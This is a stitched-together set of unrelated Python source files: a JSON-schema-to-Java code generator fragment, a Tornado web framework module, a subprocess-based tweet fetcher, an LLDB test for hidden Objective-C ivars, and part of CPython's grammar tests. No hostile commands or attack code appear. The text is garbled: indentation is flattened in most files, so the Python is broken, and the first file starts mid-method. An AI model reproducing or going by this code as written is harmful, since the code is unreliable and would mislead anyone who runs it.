source += self.indent(3) + extraIndent + variableName + ".add(new " + projectPrefix + className + "(" + variableName + "Array.getJSONObject(i)));"
source += self.indent(2) + extraIndent + "}"
source += self.indent(2) + "}"
elif baseType == "date":
self.addOrIgnoreMemberVariable("private", self.cap(self.convertToJavaType(prop.rootBaseType())), self.getVariableName(prop.type_name))
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = new Date(json.getInt(\"" + self.getVariableName(prop.type_name) + "\") / 1000);"
else:
source += self.indent(2) + "final int " + self.getVariableName(prop.type_name) + "Timestamp = json.optInt(\"" + self.getVariableName(prop.type_name) + "\", -1);"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "Timestamp == -1) {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = new Date(" + self.getVariableName(prop.type_name) + "Timestamp / 1000);"
source += self.indent(2) + "}"
else:
if self.isNatural(prop.rootBaseType()) is True:
self.addOrIgnoreMemberVariable("private", self.cap(self.convertToJavaType(prop.rootBaseType())), self.getVariableName(prop.type_name))
getMethod = typeClassName
if getMethod == "Object":
getMethod = "" # reset as the getter for Object is just json.get()
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = json.get" + getMethod + "(\"" + self.getVariableName(prop.type_name) + "\");"
else:
if len(getMethod) == 0:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = json.opt" + getMethod + "(\"" + self.getVariableName(prop.type_name) + "\");"
else:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = json.opt" + getMethod + "(\"" + self.getVariableName(prop.type_name) + "\", " + str(self.getDefaultValue(typeClassName)) + ");"
else:
self.addOrIgnoreMemberVariable("private", self.projectPrefix + self.cap(typeName), self.getVariableName(prop.type_name))
typeName = self.convertToJavaType(prop.base_type)
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = new " + self.projectPrefix + self.cap(typeName) + "(json.getJSONObject(\"" + self.getVariableName(prop.type_name) + "\"));"
else:
source += self.indent(2) + "final JSONObject " + self.getVariableName(prop.type_name) + "Json = json.optJSONObject(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "Json == null) {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = new " + self.projectPrefix + self.cap(typeName) + "(" + self.getVariableName(prop.type_name) + "Json);"
source += self.indent(2) + "}"
return source
def getImports(self, schemeObj):
source = "\nimport org.json.JSONObject;"
source += "\nimport org.json.JSONArray;"
source += "\nimport org.json.JSONException;"
source += "\nimport java.util.ArrayList;"
source += "\nimport java.util.Date;" # somehow date will not be added later - temporary static import
source += "\nimport " + self.dirPath.replace("/", ".") + ".*;"
source += "\n\nimport java.lang.IllegalArgumentException;\n"
stringImported = False
dateImported = False
regexImported = False
for prop in schemeObj.props:
baseTypes = schemeObj.getScheme(schemeObj.getScheme(prop.type_name).type_name).getBaseTypes()
if prop.base_type == "string" and stringImported is False:
source += "import java.lang.String;\n"
stringImported = True
if prop.base_type == "date" and dateImported is False:
source += "import java.util.Date;\n"
dateImported = True
for baseType in baseTypes:
if not schemeObj.hasScheme(baseType):
continue
else:
base = schemeObj.getScheme(baseType)
if len(base.regex) > 0 and regexImported is False:
source += "import java.util.regex.Pattern;\n"
regexImported = True
return source
def getConstructor(self, schemeObj):
source = self.indent(1) + "public " + self.cap(self.getClassName(schemeObj)) + "(JSONObject json) throws JSONException {"
if self.isChild:
source += self.indent(2) + "super(json);"
else:
source += self.indent(2) + "if (json == null) {"
source += self.indent(3) + "throw new IllegalArgumentException(\"JSONObject can't be null\");"
source += self.indent(2) + "}"
for prop in schemeObj.props:
source += self.getMethod(schemeObj, prop)
source += self.indent(1) + "}\n"
return source
### helper methods
def cap(self, name):
return name[0].capitalize() + name[1:]
def low(self, name):
return name[0].lower() + name[1:]
def indent(self, size):
i = 0
indent = "\n"
while i < size:
indent += " "
i += 1
return indent
def convertToJavaType(self, objCType):
if objCType == "number":
return "double"
elif objCType == "any":
return "Object"
elif objCType == "data":
return "byte"
elif objCType == "string":
return "String"
elif objCType == "date":
return "Date"
else:
return objCType
def isNatural(self, objectType):
objectType = self.convertToJavaType(objectType)
return objectType in self.naturalList
def getDefaultValue(self, type):
typeName = self.low(self.convertToJavaType(type))
if typeName == "double":
return 0
elif typeName == "boolean":
return "false"
return "null"
def addOrIgnoreMemberVariable(self, visibility, type, name):
newVariable = visibility + " " + type + " " + name + ""
if not newVariable in self.memberVariables.split("\n"):
self.memberVariables += newVariable + "\n"
def createMethodHead(self, visibility, returnType, name, parameter = ""):
return self.indent(1) + visibility + " " + returnType + " " + name + "(" + parameter + ") {"
def createSetter(self, variableString):
elements = variableString.split(" ")
if len(elements) == 3:
source = self.createMethodHead("public", "void", "set" + self.cap(elements[2]), elements[1] + " " + self.low(elements[2]))
source += self.indent(2) + "this." + elements[2] + " = " + self.low(elements[2]) + ";"
source += self.indent(1) + "}\n"
return source
return ""
def createGetter(self, variableString):
elements = variableString.split(" ")
if len(elements) == 3:
source = self.createMethodHead("public", elements[1], "get" + self.cap(elements[2]))
source += self.indent(2) + "return " + elements[2] + ";"
source += self.indent(1) + "}\n"
return source
return ""
def getClassName(self, schemeObj):
if self.isAbstract is True:
return "Abstract" + schemeObj.getClassName()
else:
return schemeObj.getClassName()
def getVariableName(self, name):
if name in ["private", "protected", "public", "class", "abstract", "final", "static"]:
return self.projectPrefix + self.cap(name)
return name
|
|
#!/usr/bin/env python
# encoding: utf-8
import json
import logging
import tornado.web
import tornado.options
from jinja2 import Environment, FileSystemLoader
from workin.conf import settings
from workin.middleware import MiddlewareManager
from workin.mixins.flash_message import FlashMessageMixin
from workin.mixins.jinja2 import Jinja2Mixin
from workin.session import Session
from workin.utils import importlib
from workin.routes import Route
class Application(tornado.web.Application):
db = None
session_engine = None
jinja_env = None
handlers = []
context_processors = []
def __init__(self, settings_module):
settings.configure(settings_module, True)
self.settings = settings.to_dict()
self._setup_extensions()
self._setup_session_engine()
self._setup_database_engine()
self._setup_template_loaders()
self._setup_installed_apps()
self._setup_context_processors()
tornado.web.Application.__init__(self, handlers=self.handlers,
**self.settings)
# Due to middleware run_init_hooks will call Application, so execute
# this at last.
self._setup_middlewares()
def __call__(self, request):
try:
self.middleware_manager.run_call_hooks(request)
handler = tornado.web.Application.__call__(self, request)
self.middleware_manager.run_endcall_hooks(handler)
except Exception as e:
logging.error(e)
raise
def _setup_middlewares(self):
self.middleware_manager = MiddlewareManager(**self.settings)
self.middleware_manager.run_init_hooks(self)
def _setup_context_processors(self):
# load context processors
processors = self.settings.get('context_processors', [])
self.context_processors = [importlib.load_class(x) for x in set(processors)]
def _setup_database_engine(self):
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from workin.database import Base
engine_url = self.settings['sqlalchemy_engine_url']
engine_kwargs = self.settings['sqlalchemy_engine_kwargs']
if not engine_url:
return
self.engine = create_engine(engine_url, **engine_kwargs)
self.db = scoped_session(sessionmaker(bind=self.engine))
Base.metadata.create_all(bind=self.engine)
def _setup_session_engine(self):
if 'session_engine' in self.settings:
engine = importlib.load_class(self.settings['session_engine'])
self.session_engine = engine(self.settings["session_secret"],
self.settings["session_options"],
self.settings["session_timeout"],
self.settings["session_cookie_domain"])
def _setup_template_loaders(self):
if "template_loader" in self.settings:
loader = self.settings['template_loader']
else:
loader = FileSystemLoader(self.settings['template_dirs'])
autoescape = bool(self.settings['autoescape'])
self.jinja_env = Environment(
loader=loader,
auto_reload=self.settings['debug'],
extensions=['workin.utils.jinja2htmlcompress.SelectiveHTMLCompress'],
autoescape=autoescape, )
def _setup_installed_apps(self):
"""Auto discovery handlers"""
if not self.settings.get('installed_apps'):
return
for app in self.settings['installed_apps']:
try:
importlib.import_module(app + '.handlers')
except ImportError as e:
logging.warn("No handlers found in app '%s': "
"%s" % (app, e))
try:
importlib.import_module(app + '.models')
except ImportError as e:
logging.warn("No models found in app '%s': "
"%s" % (app, e))
self.handlers.extend(Route.routes())
def _setup_extensions(self):
"""Auto discovery workin extensions"""
if not self.settings.get('workin_extensions'):
return
from workin.extensions import BaseDiscover, find_extensions
for ext in self.settings['workin_extensions']:
discovery = find_extensions(ext)
if isinstance(discovery, BaseDiscover):
logging.info("Install workin.exts.admin ...")
discovery.execute(self)
class BaseHandler(Jinja2Mixin, tornado.web.RequestHandler):
def _populate_context_from_ctxprocessors(self, context):
ctx = {}
ctx.update(context)
for ctx_processor in self.application.context_processors:
ctx.update(ctx_processor(self))
return ctx
def render_string(self, template_name, **context):
context = self._populate_context_from_ctxprocessors(context)
return super(BaseHandler, self).render_string(template_name, **context)
def prepare(self):
self.application.middleware_manager.run_request_hooks(self)
super(BaseHandler, self).prepare()
def finish(self, chunk=None):
self.application.middleware_manager.run_response_hooks(self)
super(BaseHandler, self).finish(chunk)
class RequestHandler(BaseHandler, FlashMessageMixin):
@property
def db(self):
return self.application.db
@property
def session(self):
if not hasattr(self, '_session'):
self._session = Session(self.application.session_engine, self)
return self._session
def on_finish(self):
if self.session: # and self.session.is_modified:
self.session.save()
# remove the sqla-session at the end of each request.
self.db.remove()
tornado.web.RequestHandler.on_finish(self)
def write_json(self, data=None, encoder=json.JSONEncoder, **kwargs):
if not data:
data = {}
self.set_header("Content-Type", "application/json")
self.write(json.dumps(data, cls=encoder, **kwargs))
def get_args(self, key, default=None, type=None):
if type == list:
if default is None:
default = []
return self.get_arguments(key, default)
value = self.get_argument(key, default)
if value and type:
try:
value = type(value)
except ValueError:
value = default
return value
@property
def is_xhr(self):
'''True if the request was triggered via a JavaScript XMLHttpRequest.
This only works with libraries that support the `X-Requested-With`
header and set it to "XMLHttpRequest". Libraries that do that are
prototype, jQuery and Mochikit and probably some more.'''
return self.request.headers.get('X-Requested-With', '') \
.lower() == 'xmlhttprequest'
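# ---------------------------------------------------------------------------
# Minimal launch sketch. This is only an illustration: the settings module
# path 'myproject.settings' and the port are placeholder assumptions, not
# part of workin itself.
if __name__ == '__main__':
    import tornado.ioloop
    tornado.options.parse_command_line()
    application = Application('myproject.settings')
    application.listen(8888)
    tornado.ioloop.IOLoop.instance().start()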
|
|
import subprocess
import shlex
import glob
import threading
import os
import sys
import signal
from tworpus import settings, data_converter
import json
from session.models import Session
__manager = None
def getManager():
"""
Singleton wrapper for FetchersManager
"""
global __manager
if __manager is None:
__manager = FetchersManager()
return __manager
class FetcherProgressListener:
def onSuccess(self, values):
pass
def onError(self, values):
pass
def onFinish(self):
pass
def onCancel(self):
pass
class FetchersManager():
"""
Wrapper around dict.
Manages a list of running processes.
"""
def __init__(self):
self.fetchers = dict()
def add(self, fetcher, _id):
self.fetchers[str(_id)] = fetcher
def get(self, _id):
# if id in self.fetchers:
# self.fetchers[id]
# else:
# None
if str(_id) in self.fetchers:
return self.fetchers[str(_id)]
def remove(self, _id):
if str(_id) in self.fetchers:
fetcher = self.get(str(_id))
fetcher.cancel()
self.fetchers.pop(str(_id))
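# Example (sketch): register a running fetcher under its corpus id so it can
# be cancelled later; the identifiers below are placeholders.
#
#   manager = getManager()
#   manager.add(fetcher, corpus_id)
#   ...
#   manager.remove(corpus_id)  # cancels the subprocess and drops the entry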
class TweetsFetcher():
"""
Fetches and merges tweets as XML file(s).
Process is done by jar file started through subprocess.
"""
def __init__(self, tweetsCsvFile, outputDir, tweetsPerXml):
self.__process = None
self.tweetsCsvFile = tweetsCsvFile
self.outputDir = outputDir
self.__cacheDir = settings.XML_CACHE_DIR
self.__canceled = False
self.__tweetsPerXml = tweetsPerXml
self.__updateListeners = []
def addListener(self, listener):
self.__updateListeners.append(listener)
def fetch(self):
thread = threading.Thread(target=self.__startJar)
thread.start()
def __startJar(self):
argsStr = "java -jar " + settings.TWORPUS_FETCHAR_JAR + \
" -input-file " + self.tweetsCsvFile + \
" -xml-cache-folder " + self.__cacheDir + \
" -xml-output-folder " + self.outputDir + \
" -split-after " + str(self.__tweetsPerXml)
# argsStr += " -override"
# argsStr += " -csv-no-title"
#setting the correct path for windows
argsStr = argsStr.replace("\\", "/")
args = shlex.split(argsStr) # creates args array for subprocess
self.__process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE)
while True:
line = self.__process.stdout.readline()
if not line:
break
values = self.parseDownloadProgressFromLine(line)
if values is not None:
if values["result"] == "success":
for listener in self.__updateListeners:
listener.onSuccess(values)
elif values["result"] == "error":
for listener in self.__updateListeners:
listener.onError(values)
sys.stdout.flush()
self.__process.communicate() # blocks subprocess until finish
if self.__canceled:
    self.__onCancel()
else:
    self.__onFinish()
def parseDownloadProgressFromLine(self, line):
"""
Receives a string/line from the command line output of tworpus_fetcher.jar
and parses relevant information like failed tweets, successful tweets and source location.
"""
line = str(line)
if not line.startswith("Fetch:"):
return None
line = line.strip("Fetch:").strip("\n")
values = line.split(",")
result = dict()
for val in values:
tupel = val.split("=")
result[str(tupel[0])] = tupel[1]
return result
def cancel(self):
"""
Terminates running tasks if there are any
"""
self.__canceled = True
if self.__process is not None:
os.kill(self.__process.pid, signal.SIGTERM)
else:
self.__onCancel()
# internal progress callbacks
def __onFinish(self):
self.__process = None
for listener in self.__updateListeners:
listener.onFinish()
def __onCancel(self):
for listener in self.__updateListeners:
listener.onCancel()
# end internal progress callbacks
class TweetProgressEventHandler(FetcherProgressListener):
def __init__(self, corpusid):
self.__corpusid = corpusid
self.__session = Session.objects.all().filter(id=corpusid).first()
self.__numTweetsFetched = 0
self.__numTweetsFailed = 0
self.__tweetsFetchedOnStart = self.__session.tweetsFetched
self.__tweetsFailedOnStart = self.__session.tweetsFailed
self.__lastProgressSent = 0
def onSuccess(self, values):
self.__numTweetsFetched += 1
if self.__numTweetsFetched > self.__tweetsFetchedOnStart:
self.__session.tweetsFetched = self.__numTweetsFetched
self.__onProgress(values)
def onError(self, values):
self.__numTweetsFailed += 1
if self.__numTweetsFailed > self.__tweetsFailedOnStart:
self.__session.tweetsFailed = self.__numTweetsFailed
self.__onProgress(values)
def onCancel(self):
self.__session.working = False
self.__session.completed = False
self.__session.save()
def onFinish(self):
from tworpus import tweet_converter
baseFolder = os.path.join(settings.BASE_PROJECT_DIR, self.__session.folder)
xmlFiles = glob.glob(os.path.join(baseFolder, "*.xml"))
for xmlFile in xmlFiles:
try:
# Run data converters if selected
converterIds = json.loads(self.__session.converters)
if len(converterIds) > 0:
newXmlFile = xmlFile + ".tmp.xml"
os.rename(xmlFile, newXmlFile)
app = tweet_converter.ConverterApp(newXmlFile, xmlFile)
converters = data_converter.get_converters_from_ids(converterIds)
for converter in converters:
class_name = converter["class_name"]
module_name = converter["module_name"]
package = converter["package"]
fullname = "converters." + package
mod = __import__(fullname, globals(), locals(), [module_name], -1)
converter_module = getattr(mod, module_name)
converter_class = getattr(converter_module, class_name)
app.register_converter(converter_class())
app.run()
except:
pass
xmlFiles = glob.glob(os.path.join(baseFolder, "*.tmp.xml"))
for xmlFile in xmlFiles:
os.remove(xmlFile)
self.__session.working = False
self.__session.completed = True
self.__session.save()
def __onProgress(self, values):
progress = (float(values["failed"]) + float(values["succeeded"])) / float(values["total"]) * 100
if progress > self.__session.progress:
self.__session.progress = progress
self.__session.save()
self.__lastProgressSent += 1
if self.__lastProgressSent == 10:
self.__lastProgressSent = 0
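# ---------------------------------------------------------------------------
# Minimal usage sketch (assumptions: the csv path and output folder below are
# placeholders, and settings.TWORPUS_FETCHAR_JAR / XML_CACHE_DIR must point at
# valid locations before fetch() is called).
if __name__ == '__main__':
    class PrintListener(FetcherProgressListener):
        def onSuccess(self, values):
            print("fetched:", values)
        def onError(self, values):
            print("failed:", values)
        def onFinish(self):
            print("all tweets processed")
    fetcher = TweetsFetcher("tweets.csv", "./xml-output", 1000)
    fetcher.addListener(PrintListener())
    getManager().add(fetcher, "demo")
    fetcher.fetch()  # runs the fetcher jar in a background thread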
|
|
"""Test that hidden ivars in a shared library are visible from the main executable."""
import unittest2
import subprocess
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class HiddenIvarsTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.m'
self.line = line_number(self.source, '// breakpoint1')
# The makefile names of the shared libraries as they appear in DYLIB_NAME.
# The names should have no leading "lib" or extension, as these are
# added automatically for the target platform.
self.shlib_names = ["InternalDefiner"]
@skipUnlessDarwin
@skipIf(
debug_info=no_match("dsym"),
bugnumber="This test requires a stripped binary and a dSYM")
@skipIfReproducer # FIXME: Unexpected packet during (passive) replay
def test_expr_stripped(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.expr(True)
@skipUnlessDarwin
@skipIfReproducer # FIXME: Unexpected packet during (passive) replay
def test_expr(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.expr(False)
@skipUnlessDarwin
@skipIf(
debug_info=no_match("dsym"),
bugnumber="This test requires a stripped binary and a dSYM")
def test_frame_variable_stripped(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.frame_var(True)
@skipUnlessDarwin
def test_frame_variable(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.frame_var(False)
@expectedFailure("rdar://18683637")
@skipUnlessDarwin
def test_frame_variable_across_modules(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.common_setup(False)
self.expect(
"frame variable k->bar",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 3"])
def common_setup(self, strip):
if strip:
exe = self.getBuildArtifact("stripped/a.out")
else:
exe = self.getBuildArtifact("a.out")
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Register our shared libraries for remote targets so they get
# automatically uploaded
environment = self.registerSharedLibrariesWithTarget(
target, self.shlib_names)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, environment, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break inside the foo function which takes a bar_ptr argument.
lldbutil.run_break_set_by_file_and_line(
self, "main.m", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
def expr(self, strip):
self.common_setup(strip)
# This should display correctly.
self.expect(
"expression (j->_definer->foo)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 4"])
self.expect(
"expression (j->_definer->bar)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 5"])
if strip:
self.expect(
"expression *(j->_definer)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo = 4"])
else:
self.expect(
"expression *(j->_definer)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 4",
"bar = 5"])
self.expect("expression (k->foo)", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 2"])
self.expect("expression (k->bar)", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 3"])
self.expect(
"expression k.filteredDataSource",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
' = 0x',
'"2 elements"'])
if strip:
self.expect("expression *(k)", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo = 2", ' = 0x', '"2 elements"'])
else:
self.expect(
"expression *(k)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 2",
"bar = 3",
'_filteredDataSource = 0x',
'"2 elements"'])
def frame_var(self, strip):
self.common_setup(strip)
# This should display correctly.
self.expect(
"frame variable j->_definer->foo",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 4"])
if not strip:
self.expect(
"frame variable j->_definer->bar",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 5"])
if strip:
self.expect(
"frame variable *j->_definer",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo = 4"])
else:
self.expect(
"frame variable *j->_definer",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 4",
"bar = 5"])
self.expect("frame variable k->foo", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 2"])
self.expect(
"frame variable k->_filteredDataSource",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
' = 0x',
'"2 elements"'])
if strip:
self.expect(
"frame variable *k",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 2",
'_filteredDataSource = 0x',
'"2 elements"'])
else:
self.expect(
"frame variable *k",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 2",
"bar = 3",
'_filteredDataSource = 0x',
'"2 elements"'])
|
|
# Python test set -- part 1, grammar.
# This just tests whether the parser accepts them all.
from test.support import run_unittest, check_syntax_error
import unittest
import sys
# testing import *
from sys import *
class TokenTests(unittest.TestCase):
def testBackslash(self):
# Backslash means line continuation:
x = 1 \
+ 1
self.assertEqual(x, 2, 'backslash for line continuation')
# Backslash does not mean continuation in comments :\
x = 0
self.assertEqual(x, 0, 'backslash ending comment')
def testPlainIntegers(self):
self.assertEqual(type(000), type(0))
self.assertEqual(0xff, 255)
self.assertEqual(0o377, 255)
self.assertEqual(2147483647, 0o17777777777)
self.assertEqual(0b1001, 9)
# "0x" is not a valid literal
self.assertRaises(SyntaxError, eval, "0x")
from sys import maxsize
if maxsize == 2147483647:
self.assertEqual(-2147483647-1, -0o20000000000)
# XXX -2147483648
self.assertTrue(0o37777777777 > 0)
self.assertTrue(0xffffffff > 0)
self.assertTrue(0b1111111111111111111111111111111 > 0)
for s in ('2147483648', '0o40000000000', '0x100000000',
'0b10000000000000000000000000000000'):
try:
x = eval(s)
except OverflowError:
self.fail("OverflowError on huge integer literal %r" % s)
elif maxsize == 9223372036854775807:
self.assertEqual(-9223372036854775807-1, -0o1000000000000000000000)
self.assertTrue(0o1777777777777777777777 > 0)
self.assertTrue(0xffffffffffffffff > 0)
self.assertTrue(0b11111111111111111111111111111111111111111111111111111111111111 > 0)
for s in '9223372036854775808', '0o2000000000000000000000', \
'0x10000000000000000', \
'0b100000000000000000000000000000000000000000000000000000000000000':
try:
x = eval(s)
except OverflowError:
self.fail("OverflowError on huge integer literal %r" % s)
else:
self.fail('Weird maxsize value %r' % maxsize)
def testLongIntegers(self):
x = 0
x = 0xffffffffffffffff
x = 0Xffffffffffffffff
x = 0o77777777777777777
x = 0O77777777777777777
x = 123456789012345678901234567890
x = 0b100000000000000000000000000000000000000000000000000000000000000000000
x = 0B111111111111111111111111111111111111111111111111111111111111111111111
def testFloats(self):
x = 3.14
x = 314.
x = 0.314
# XXX x = 000.314
x = .314
x = 3e14
x = 3E14
x = 3e-14
x = 3e+14
x = 3.e14
x = .3e14
x = 3.1e4
def testStringLiterals(self):
x = ''; y = ""; self.assertTrue(len(x) == 0 and x == y)
x = '\''; y = "'"; self.assertTrue(len(x) == 1 and x == y and ord(x) == 39)
x = '"'; y = "\""; self.assertTrue(len(x) == 1 and x == y and ord(x) == 34)
x = "doesn't \"shrink\" does it"
y = 'doesn\'t "shrink" does it'
self.assertTrue(len(x) == 24 and x == y)
x = "does \"shrink\" doesn't it"
y = 'does "shrink" doesn\'t it'
self.assertTrue(len(x) == 24 and x == y)
x = """
The "quick"
brown fox
jumps over
the 'lazy' dog.
"""
y = '\nThe "quick"\nbrown fox\njumps over\nthe \'lazy\' dog.\n'
self.assertEqual(x, y)
y = '''
The "quick"
brown fox
jumps over
the 'lazy' dog.
'''
self.assertEqual(x, y)
y = "\n\
The \"quick\"\n\
brown fox\n\
jumps over\n\
the 'lazy' dog.\n\
"
self.assertEqual(x, y)
y = '\n\
The \"quick\"\n\
brown fox\n\
jumps over\n\
the \'lazy\' dog.\n\
'
self.assertEqual(x, y)
def testEllipsis(self):
x = ...
self.assertTrue(x is Ellipsis)
self.assertRaises(SyntaxError, eval, ".. .")
class GrammarTests(unittest.TestCase):
# single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE
# XXX can't test in a script -- this rule is only used when interactive
# file_input: (NEWLINE | stmt)* ENDMARKER
# Being tested as this very moment this very module
# expr_input: testlist NEWLINE
# XXX Hard to test -- used only in calls to input()
def testEvalInput(self):
# testlist ENDMARKER
x = eval('1, 0 or 1')
def testFuncdef(self):
### [decorators] 'def' NAME parameters ['->' test] ':' suite
### decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
### decorators: decorator+
### parameters: '(' [typedargslist] ')'
### typedargslist: ((tfpdef ['=' test] ',')*
### ('*' [tfpdef] (',' tfpdef ['=' test])* [',' '**' tfpdef] | '**' tfpdef)
### | tfpdef ['=' test] (',' tfpdef ['=' test])* [','])
### tfpdef: NAME [':' test]
### varargslist: ((vfpdef ['=' test] ',')*
### ('*' [vfpdef] (',' vfpdef ['=' test])* [',' '**' vfpdef] | '**' vfpdef)
### | vfpdef ['=' test] (',' vfpdef ['=' test])* [','])
### vfpdef: NAME
def f1(): pass
f1()
f1(*())
f1(*(), **{})
def f2(one_argument): pass
def f3(two, arguments): pass
self.assertEqual(f2.__code__.co_varnames, ('one_argument',))
self.assertEqual(f3.__code__.co_varnames, ('two', 'arguments'))
def a1(one_arg,): pass
def a2(two, args,): pass
def v0(*rest): pass
def v1(a, *rest): pass
def v2(a, b, *rest): pass
f1()
f2(1)
f2(1,)
f3(1, 2)
f3(1, 2,)
v0()
v0(1)
v0(1,)
v0(1,2)
v0(1,2,3,4,5,6,7,8,9,0)
v1(1)
v1(1,)
v1(1,2)
v1(1,2,3)
v1(1,2,3,4,5,6,7,8,9,0)
v2(1,2)
v2(1,2,3)
v2(1,2,3,4)
v2(1,2,3,4,5,6,7,8,9,0)
def d01(a=1): pass
d01()
d01(1)
d01(*(1,))
d01(**{'a':2})
def d11(a, b=1): pass
d11(1)
d11(1, 2)
d11(1, **{'b':2})
def d21(a, b, c=1): pass
d21(1, 2)
d21(1, 2, 3)
d21(*(1, 2, 3))
d21(1, *(2, 3))
d21(1, 2, *(3,))
d21(1, 2, **{'c':3})
def d02(a=1, b=2): pass
d02()
d02(1)
d02(1, 2)
d02(*(1, 2))
d02(1, *(2,))
d02(1, **{'b':2})
d02(**{'a': 1, 'b': 2})
def d12(a, b=1, c=2): pass
d12(1)
d12(1, 2)
d12(1, 2, 3)
def d22(a, b, c=1, d=2): pass
d22(1, 2)
d22(1, 2, 3)
d22(1, 2, 3, 4)
def d01v(a=1, *rest): pass
d01v()
d01v(1)
d01v(1, 2)
d01v(*(1, 2, 3, 4))
d01v(*(1,))
d01v(**{'a':2})
def d11v(a, b=1, *rest): pass
d11v(1)
d11v(1, 2)
d11v(1, 2, 3)
def d21v(a, b, c=1, *rest): pass
d21v(1, 2)
d21v(1, 2, 3)
d21v(1, 2, 3, 4)
d21v(*(1, 2, 3, 4))
d21v(1, 2, **{'c': 3})
def d02v(a=1, b=2, *rest): pass
d02v()
d02v(1)
d02v(1, 2)
d02v(1, 2, 3)
d02v(1, *(2, 3, 4))
d02v(**{'a': 1, 'b': 2})
def d12v(a, b=1, c=2, *rest): pass
d12v(1)
d12v(1, 2)
d12v(1, 2, 3)
d12v(1, 2, 3, 4)
d12v(*(1, 2, 3, 4))
d12v(1, 2, *(3, 4, 5))
d12v(1, *(2,), **{'c': 3})
def d22v(a, b, c=1, d=2, *rest): pass
d22v(1, 2)
d22v(1, 2, 3)
d22v(1, 2, 3, 4)
d22v(1, 2, 3, 4, 5)
d22v(*(1, 2, 3, 4))
d22v(1, 2, *(3, 4, 5))
d22v(1, *(2, 3), **{'d': 4})
# keyword argument type tests
try:
str('x', **{b'foo':1 })
except TypeError:
pass
else:
self.fail('Bytes should not work as keyword argument names')
# keyword only argument tests
def pos0key1(*, key): return key
pos0key1(key=100)
def pos2key2(p1, p2, *, k1, k2=100): return p1,p2,k1,k2
pos2key2(1, 2, k1=100)
pos2key2(1, 2, k1=100, k2=200)
pos2key2(1, 2, k2=100, k1=200)
def pos2key2dict(p1, p2, *, k1=100, k2, **kwarg): return p1,p2,k1,k2,kwarg
pos2key2dict(1,2,k2=100,tokwarg1=100,tokwarg2=200)
pos2key2dict(1,2,tokwarg1=100,tokwarg2=200, k2=100)
# keyword arguments after *arglist
def f(*args, **kwargs):
return args, kwargs
self.assertEqual(f(1, x=2, *[3, 4], y=5), ((1, 3, 4),
{'x':2, 'y':5}))
self.assertRaises(SyntaxError, eval, "f(1, *(2,3), 4)")
self.assertRaises(SyntaxError, eval, "f(1, x=2, *(3,4), x=5)")
# argument annotation tests
def f(x) -> list: pass
self.assertEqual(f.__annotations__, {'return': list})
def f(x:int): pass
self.assertEqual(f.__annotations__, {'x': int})
def f(*x:str): pass
self.assertEqual(f.__annotations__, {'x': str})
def f(**x:float): pass
self.assertEqual(f.__annotations__, {'x': float})
def f(x, y:1+2): pass
self.assertEqual(f.__annotations__, {'y': 3})
def f(a, b:1, c:2, d): pass
self.assertEqual(f.__annotations__, {'b': 1, 'c': 2})
def f(a, b:1, c:2, d, e:3=4, f=5, *g:6): pass
self.assertEqual(f.__annotations__,
{'b': 1, 'c': 2, 'e': 3, 'g': 6})
